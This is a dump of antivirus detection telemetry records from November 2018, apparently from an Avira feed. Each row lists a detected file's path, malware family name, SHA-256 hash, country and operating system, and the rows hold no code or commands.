  Row(detection=Row(filename='avscan-20181102-053609-2c293616', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053609-2C293616', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061745-fbcf30c9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061745-FBCF30C9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060454-301a47ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060454-301A47EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051456-353faf7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051456-353FAF7C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060455-30b9b7c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060455-30B9B7C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060551-5218d22b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060551-5218D22B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052918-3707e5b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052918-3707E5B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061806-084c8628', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061806-084C8628', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052757-0691a2df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052757-0691A2DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053522-1033f36a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053522-1033F36A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060359-0f82d8b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060359-0F82D8B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052100-0e28a082', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052100-0E28A082', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054039-ccd87627', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054039-CCD87627', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061742-f9f80e71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061742-F9F80E71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051016-8e9a1a0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051016-8E9A1A0F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060639-6f0bda1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060639-6F0BDA1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054832-e6cc2d6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054832-E6CC2D6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:57:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053315-c44d5e54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053315-C44D5E54', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062141-88a4c930', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062141-88A4C930', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:59:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060913-ca973e4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060913-CA973E4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053319-c6943fde', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053319-C6943FDE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062225-a2849917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062225-A2849917', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050843-56ad5d07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050843-56AD5D07', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055756-3701c735', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055756-3701C735', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T05:48:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054457-66c97b74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054457-66C97B74', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:40:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053454-ffa4c9d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053454-FFA4C9D6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055154-5f55ddeb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055154-5F55DDEB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060050-9e892d15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060050-9E892D15', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050508-d6e47313', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050508-D6E47313', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060700-7b2002ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060700-7B2002AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055202-63cd6aaf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055202-63CD6AAF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055130-50cdd0db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055130-50CDD0DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062305-ba663759', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062305-BA663759', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062425-ea7f145f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062425-EA7F145F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054432-57ccb274', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054432-57CCB274', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053742-6378714d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053742-6378714D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ghp laserjet pro p1102 winxp 32-en.exe', filepath='\\\\?\\J:\\iso\\Pro\\Dr\\gHP LaserJet Pro P1102 winXP 32-en.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='50f64754ca34d1cfef504028c5349dd3159bb6e40913ed3fa82c5c14d8a3f26e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:33:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='236d7f7aa7b3736f4871db14eafca24be9ee89b99c778ea248cb61f209fb370a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\236D7F7AA7B3736F4871DB14EAFCA24BE9EE89B99C778EA248CB61F209FB370A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='236d7f7aa7b3736f4871db14eafca24be9ee89b99c778ea248cb61f209fb370a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:13:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstall.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\{28e56cfb-e30e-4f66-85d8-339885b726b8}\\Uninstall.exe', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='512982bfcdf8e5d6b18409af4fc82208b0f59112c3b55181259a9c2f7b427069', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:36:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhbe1a', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHBE1A', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:43:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:48:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231749-0f6a0307', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e05eca8a\\AVSCAN-20181101-231720-0BD7B32B\\AVSCAN-20181101-231749-0F6A0307', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:17:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fav3.exe', filepath='D:\\Fav3.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpa smk3.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\2015\\LPA SMK3\\LPA SMK3.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7662165\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Baixaki_utorrent_2968322039.exe', parentsize=2202824, timestamp='2018-11-01T09:46:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160237-04b7286d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160237-04B7286D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh2211', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH2211', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:40:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:43:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171648-2af1a826', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2ac047b8\\AVSCAN-20181101-171638-28E900CA\\AVSCAN-20181101-171648-2AF1A826', filesize=512000, name='PUA/FusionCore.Gen7.#M1.#R1'), hash='00eb83e0c976d7e8269c5e42ea02793dc98a4d07755dfe27a3c21c0a584418b8', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:17:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:27:44Z'), dt=datetime.date(2018, 11, 1)),
